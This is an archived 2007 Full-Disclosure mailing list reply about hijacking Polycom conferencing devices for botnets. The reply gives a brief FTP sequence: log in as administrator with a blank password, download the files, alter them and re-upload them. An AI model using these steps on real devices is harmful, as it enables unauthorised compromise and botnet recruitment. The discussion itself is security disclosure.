[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [Full-disclosure] Polycom hacking
From: Paul Schmehl <pauls () utdallas ! edu>
Date: 2007-06-29 14:25:21
Message-ID: 5A91B1235292B85CF08212FD () utd59514 ! utdallas ! edu
[Download RAW message or body]
[Attachment #2 (multipart/signed)]
--On Thursday, June 28, 2007 22:25:08 -0400 Peter Dawson
<slash.pd@gmail.com> wrote:
> interesting concept.. harvesting a polycom device for Botnet's.
>
> hmmmmmmmmm.. the key would be how the heck to get the stealthware on
> such a device ??
>
That's easy.
ftp target.domain.tld
user administrator
pass (blank)
mget *
alter files to suit
mput *
--
Paul Schmehl (pauls@utdallas.edu)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/
[Attachment #5 (application/pkcs7-signature)]
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic